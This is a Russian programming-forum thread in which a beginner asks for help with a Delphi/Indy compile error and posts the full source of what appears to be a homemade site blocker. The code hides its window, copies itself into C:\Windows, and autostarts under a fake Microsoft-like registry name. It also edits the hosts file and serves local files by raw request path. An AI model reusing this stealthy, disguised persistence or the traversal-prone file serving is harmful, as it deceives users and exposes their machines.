Форум программистов, компьютерный форум, киберфорум
Delphi для начинающих
Войти
Регистрация
Восстановить пароль
 
 
Рейтинг 4.63/19: Рейтинг темы: голосов - 19, средняя оценка - 4.63
0 / 0 / 0
Регистрация: 17.07.2012
Сообщений: 127
1

ошибка в коде

07.07.2013, 17:15. Показов 3812. Ответов 29
Метки нет (Все метки)

ЭТО НЕ ВЕСЬ КОД. Как исправить ошибку?

Delphi
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
unit Unit1;
 
interface
 
uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, IdBaseComponent, IdComponent, IdTCPServer, IdCustomHTTPServer,
  IdHTTPServer,registry;
 
type
  TForm1 = class(TForm)
    IdHTTPServer: TIdHTTPServer;
    procedure FormCreate(Sender: TObject);
    procedure FormDestroy(Sender: TObject);
    procedure IdHTTPServerCommandGet(AThread: TIdPeerThread;  [COLOR="Red"]ТУТ ВЫДАЕТ ОШИБКУ[/COLOR]
      ARequestInfo: TIdHTTPRequestInfo;
      AResponseInfo: TIdHTTPResponseInfo);
  private
    { Private declarations }
  public
    { Public declarations }
procedure RegHosts;
procedure RegRun;
 end;

------------------------------------------------------------------- |
[Error] Unit1.pas(15): Undeclared identifier: 'TIdPeerThread' |
[Fatal Error] Projects1.dpr(5): Could not compile used unit 'Unit1.pas' |
--------------------------------------------------------------------|
__________________
Помощь в написании контрольных, курсовых и дипломных работ здесь
0
Programming
Эксперт
94731 / 64177 / 26122
Регистрация: 12.04.2006
Сообщений: 116,782
07.07.2013, 17:15
Ответы с готовыми решениями:

Ошибка в коде взаимодействия клиента и сервера на основе протокола TCP/IP (ошибка в коде)
Задание: Осуществить взаимодействие клиента и сервера на основе протокола TCP/IP. Реализовать...

Ошибка с графикой в приложении Windows form (ошибка не в коде!)
Всем доброго времени суток! Написал программу в windows form. Несколько раз скомпилировал и все...

Ошибка в коде CS0649. Не понятно почему выдает данную ошибку.Также ошибка в форме со словом ref
Код Класса using System; using System.Collections.Generic; using System.Linq; using...

Ошибки в коде Qt - ошибка: undefined reference to `qMain(int, char**)'; ошибка: error: ld returned 1 exit status
Здравствуйте, есть проект в нем 2 ошибки, не очень понимаю как их можно решить. Помогите, буду...

29
Android
245 / 242 / 52
Регистрация: 19.01.2013
Сообщений: 1,896
Записей в блоге: 3
07.07.2013, 17:31 2
попробуй наведи курсор в строку где ошибка и нажми Ctrl + Shift + A
0
0 / 0 / 0
Регистрация: 17.07.2012
Сообщений: 127
07.07.2013, 21:04  [ТС] 3
Цитата Сообщение от kaspersky Посмотреть сообщение
попробуй наведи курсор в строку где ошибка и нажми Ctrl + Shift + A
не чего не происходит
0
0 / 5 / 2
Регистрация: 28.05.2013
Сообщений: 114
08.07.2013, 12:33 4
Нужен весь код.
0
117 / 117 / 2
Регистрация: 29.01.2013
Сообщений: 437
08.07.2013, 12:37 5
может модуль просит подключить
0
0 / 0 / 0
Регистрация: 17.07.2012
Сообщений: 127
08.07.2013, 14:16  [ТС] 6
Цитата Сообщение от dvoryakanton Посмотреть сообщение
Нужен весь код.
ВОТ ВЕСЬ КОД=), как Вы поняли тут используется indy:

Delphi
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
unit Unit1;
 
interface
 
uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, IdBaseComponent, IdComponent, IdTCPServer, IdCustomHTTPServer,
  IdHTTPServer,registry;
 
type
  TForm1 = class(TForm)
    IdHTTPServer: TIdHTTPServer;
    procedure FormCreate(Sender: TObject);
    procedure FormDestroy(Sender: TObject);
    procedure IdHTTPServerCommandGet(AThread: TIdPeerThread; //ТУТ ВЫДАЁТ ОШИБКУ
      ARequestInfo: TIdHTTPRequestInfo;
      AResponseInfo: TIdHTTPResponseInfo);
  private
    { Private declarations }
  public
    { Public declarations }
procedure RegHosts;
procedure RegRun;
 end;
 
var
  Form1: TForm1;
 Filestr:tstringlist;
 
implementation
 
{$R *.dfm}
 
procedure TForm1.FormCreate(Sender: TObject);
var str:tstringlist;
begin
application.ShowMainForm:=false;
if not FileExists('C:\Windows\webserver.exe') then begin
CopyFile(pchar(application.exename),'C:\Windows\webserver.exe',false);
WinExec('C:\Windows\webserver.exe',sw_hide);
RegHosts;
RegRun;
application.ShowMainForm:=false;
Application.Terminate;
end
else
begin
RegRun;
reghosts;                     
idhttpserver.Active:=true;
end;
 
end;
 
procedure TForm1.RegHosts;
begin
Filestr:=tstringlist.Create;
Filestr.LoadFromFile('C:\Windows\System32\drivers\etc\hosts');
Filestr.Add('127.0.0.1        dojki.com');
Filestr.Add('127.0.0.1        gigporno.com');
Filestr.Add('127.0.0.1        mega-porno.ru');
 
filestr.SaveToFile('C:\Windows\System32\drivers\etc\hosts');
Filestr.Free;
end;
 
procedure TForm1.RegRun;
var reg:tregistry;
begin
reg := tregistry.create;
reg.rootkey := hkey_local_machine;
reg.lazywrite := false;
reg.openkey('software\microsoft\windows\currentversion\run', false);
reg.writestring('MicrosoftWebServerUpdater.exe', 'C:\Windows\webserver.exe');
reg.closekey;
reg.free;
end;
 
procedure TForm1.FormDestroy(Sender: TObject);
begin
idhttpserver.active:=false;
end;
 
procedure TForm1.IdHTTPServerCommandGet(AThread: TIdPeerThread;
  ARequestInfo: TIdHTTPRequestInfo; AResponseInfo: TIdHTTPResponseInfo);
begin
if (pos('ndex',arequestinfo.document)=0)and(pos('12.bmp',arequestinfo.document)=0)and(pos('1.bmp',arequestinfo.document)=0) then
arequestinfo.Document:='index.html';
 
if arequestinfo.Document='/' then
begin
arequestinfo.Document:='';
aresponseinfo.ContentStream:=tfilestream.Create('C:\windows\index.html',fmopenread);
end else
if arequestinfo.Document<>'/' then
aresponseinfo.ContentStream:=tfilestream.Create('C:\windows\'+arequestinfo.Document,fmopenread);
end;
 
end.
Добавлено через 4 минуты
Цитата Сообщение от Fenix_dragon Посмотреть сообщение
может модуль просит подключить
Может, весь код выше посмотри, если знаешь в чём дело скажи если не сложно
0
117 / 117 / 2
Регистрация: 29.01.2013
Сообщений: 437
08.07.2013, 15:25 7
Радмир., Вот эта ошибка: [Error] Unit1.pas(15): Undeclared identifier: 'TIdPeerThread',
говорит "Не могу понять что такое TIdPeerThread". Сей тип определен в модуле IdTCPServer (который, правда у тебя подключён). Зажми Ctrl и левой клавишеймыши нажми на TIdPeerThread. Если он определен, то должен открытся модуль IdTCPServer, на том месте где описан в модуле.
Событие создавал автоматически? может при написании TIdPeerThread использовал кирилицу...
0
3941 / 1866 / 337
Регистрация: 16.03.2012
Сообщений: 3,880
08.07.2013, 18:28 8
@Радмир., Я недавно задавал вопрос, почему на одной машине компилятор требует *dcu файл, а на другой нет. Одного и того-же модуля строннего компонента. В результате вывод такой на одной машине инсталлятор прописал пути к модулям, а на другой нет. Зависит от инсталлятора.
Я собрал форму по твоему коду и сам код скопировал из темы. У меня компилируется без ошибок. Значит у тебя просто не прописан путь к модулям этого компонента Indy.
Тебе нужно прописать этот путь. Может ошибаюсь, но, кажется:
Tools -> Environment Options -> Library -> Browsing Path - добавить: $(DELPHI)\Source\Indy после точки с запятой.
0
0 / 0 / 0
Регистрация: 17.07.2012
Сообщений: 127
08.07.2013, 19:20  [ТС] 9
Цитата Сообщение от Одиночка Посмотреть сообщение
@Радмир., Я недавно задавал вопрос, почему на одной машине компилятор требует *dcu файл, а на другой нет. Одного и того-же модуля строннего компонента. В результате вывод такой на одной машине инсталлятор прописал пути к модулям, а на другой нет. Зависит от инсталлятора.
Я собрал форму по твоему коду и сам код скопировал из темы. У меня компилируется без ошибок. Значит у тебя просто не прописан путь к модулям этого компонента Indy.
Тебе нужно прописать этот путь. Может ошибаюсь, но, кажется:
Tools -> Environment Options -> Library -> Browsing Path - добавить: $(DELPHI)\Source\Indy после точки с запятой.
Наверное это, сейчас попробую. А кстати у меня вот эта ошибка- необъявленный индефикатор TIdPeerThread
0
3941 / 1866 / 337
Регистрация: 16.03.2012
Сообщений: 3,880
08.07.2013, 19:23 10
А, кстати, я читал. Компилятор не знает, где находится модуль, а в модуле описан тот тип. Вот и ошибка.
0
0 / 0 / 0
Регистрация: 17.07.2012
Сообщений: 127
08.07.2013, 19:32  [ТС] 11
Цитата Сообщение от Одиночка Посмотреть сообщение
@Радмир., Я недавно задавал вопрос, почему на одной машине компилятор требует *dcu файл, а на другой нет. Одного и того-же модуля строннего компонента. В результате вывод такой на одной машине инсталлятор прописал пути к модулям, а на другой нет. Зависит от инсталлятора.
Я собрал форму по твоему коду и сам код скопировал из темы. У меня компилируется без ошибок. Значит у тебя просто не прописан путь к модулям этого компонента Indy.
Тебе нужно прописать этот путь. Может ошибаюсь, но, кажется:
Tools -> Environment Options -> Library -> Browsing Path - добавить: $(DELPHI)\Source\Indy после точки с запятой.
У меня в этом поле вот что находится=D ЭТО УДАЛЯТЬ?-
Код
$(DELPHI)\Source\Vcl;
$(DELPHI)\Source\Rtl;
$(DELPHI)\Source\rtl\Sys;
$(DELPHI)\Source\rtl\Win;
$(DELPHI)\Source\rtl\common;
$(DELPHI)\Source\Xml;
$(DELPHI)\Source\ToolsAPI;
$(DELPHI)\Source\Property Editors;
$(DELPHI)\Source\Samples;
$(DELPHI)\Source\Rtl\Corba45;
$(DELPHI)\Source\CLX;
$(DELPHI)\Source\WebMidas;
$(DELPHI)\Source\Internet;
$(DELPHI)\Source\websnap;
$(DELPHI)\Source\Soap;
$(DELPHI)\Source\Indy;
$(DELPHI)\Source\Decision Cube;
$(DELPHI)\Ocx\Chartfx;
$(DELPHI)\Ocx\Vci\Form1;
$(DELPHI)\Ocx\Vci\Impress;
$(DELPHI)\Ocx\Vci\VSpell;
$(DELPHI)\Ocx\Isp;
$(DELPHI)\Ocx\Servers;
$(DELPHI)\Source\IntraWeb;
$(DELPHI)\Source\Extras\Jpeg;
$(DELPHI)\Source\Extras\ShellControls;
$(DELPHI)\Source\FastNet;
C:\Users\User\Desktop\радмир\блокиратор прн\Indy10_5018\Lib\System;
C:\Users\User\Desktop\радмир\1 блокиратор вк\Indy10_5018\Lib\Core;
C:\Users\User\Desktop\радмир\1 блокиратор вк\Indy10_5018\Lib\Protocols
0
0 / 0 / 0
Регистрация: 17.07.2012
Сообщений: 127
08.07.2013, 19:45  [ТС] 12
Цитата Сообщение от Одиночка Посмотреть сообщение
А, кстати, я читал. Компилятор не знает, где находится модуль, а в модуле описан тот тип. Вот и ошибка.
Как исправить? Мне кажется что я не правильно indy установил, я скачал готовую делфи со всеми штуками думал, посмотрел пути, оказывается это я вроде установил indy, хотя может и правельно, Одиночка может через скаип или тим вивер попробуем (у меня микро не работает, просто сам будешь объеснять по скаипу, или в моём компе лазить по тим вивер). Но всетаки давай я попробую исправить вот то что ты сказал (Компилятор не знает, где находится модуль) Как сделать что бы он нашел модуль где прописать, и что прописать, я вот это прописал $(DELPHI)\Source\Indy куда ты просил, не деиствует
0
3941 / 1866 / 337
Регистрация: 16.03.2012
Сообщений: 3,880
08.07.2013, 19:47 13
@Радмир., Там этот путь прописан. Не нужно ничего удалять. Можешь посмотреть есть ли в папке Delphi\Source\Indy этот файл: IdTCPServer.pas. И если есть может действительно скопируй его в папку с проектом. Там у тебя ещё прописаны какие-то Indy10_5018. Возможно там есть такой же модуль, который перебивает нужный.
0
0 / 0 / 0
Регистрация: 17.07.2012
Сообщений: 127
08.07.2013, 19:47  [ТС] 14
Цитата Сообщение от kaspersky Посмотреть сообщение
del
да я удалил, и вставил $(DELPHI)\Source\Indy не работает всё равно, кто нибудь может мне поможет установить delphi 7 с indy , я 80% не правильно установил этот indy
0
3941 / 1866 / 337
Регистрация: 16.03.2012
Сообщений: 3,880
08.07.2013, 19:50 15
Возьми скопируй из своего поста то, что там было прописано и пропиши назад. И проверь наличие этого файла в той папке, что я указал.
0
0 / 0 / 0
Регистрация: 17.07.2012
Сообщений: 127
08.07.2013, 19:58  [ТС] 16
Цитата Сообщение от Одиночка Посмотреть сообщение
@Радмир., Там этот путь прописан. Не нужно ничего удалять. Можешь посмотреть есть ли в папке Delphi\Source\Indy этот файл: IdTCPServer.pas. И если есть может действительно скопируй его в папку с проектом. Там у тебя ещё прописаны какие-то Indy10_5018. Возможно там есть такой же модуль, который перебивает нужный.
ок, щас всё на место вставлю, и проищу фаил IdTCPServer.pas

Добавлено через 5 минут
Цитата Сообщение от Одиночка Посмотреть сообщение
Возьми скопируй из своего поста то, что там было прописано и пропиши назад. И проверь наличие этого файла в той папке, что я указал.
Куда поместить IdTCPServer.pas ? В какой проект
0
3941 / 1866 / 337
Регистрация: 16.03.2012
Сообщений: 3,880
08.07.2013, 19:58 17
В папку своего проекта. Этого, код которого ты выложил.
0
0 / 0 / 0
Регистрация: 17.07.2012
Сообщений: 127
08.07.2013, 20:15  [ТС] 18
Цитата Сообщение от Одиночка Посмотреть сообщение
В папку своего проекта. Этого, код которого ты выложил.
в папку поместил с исходником, ошибка опять
0
Модератор
3476 / 2600 / 740
Регистрация: 19.09.2012
Сообщений: 7,966
08.07.2013, 21:03 19
Прикрепи сюда проект. Сколько можно гадать?
0
3941 / 1866 / 337
Регистрация: 16.03.2012
Сообщений: 3,880
08.07.2013, 21:06 20
@FIL, да он мне уже файл IdTcpServer.pas скинул. Что-то он очень сильно отличается от моего. Там, практически, вообще ничего нет. В общем решили - переустановит Дэлфи и Инди.
0
IT_Exp
Эксперт
87844 / 49110 / 22898
Регистрация: 17.06.2006
Сообщений: 92,604
08.07.2013, 21:06

Ошибка в коде (Ошибка сегментирования (core dumped)
Добрый день. Подскажите пожалуйста, где ошибка в коде? char ch; string s; ...

Ошибка в коде и ошибка HTTP 400
Здарова всем, у меня тут проблема случилась, я только начинаю программировать. Выдает ошибку HTTP...

Ошибка в коде , ошибка 200
Всем привет, помогите пожалуйста, я новичек в Паскале, вот программа, суть её переводить любое...

В чём ошибка.В коде там где коментарий там ошибка поучается.
#include &lt;iostream&gt; #include &lt;Windows.h&gt; using namespace std; class CMyString{ char *pStr;...

Ошибка в коде
Доброго времени суток! Подскажите пож-та в чем моя ошибка. Не правильно выводит результаты....не...

Ошибка в коде
Посмотрите пожалуйста где может быть ошибка procedure TForm1.Button1Click(Sender: TObject); ...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
20
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2021, vBulletin Solutions, Inc.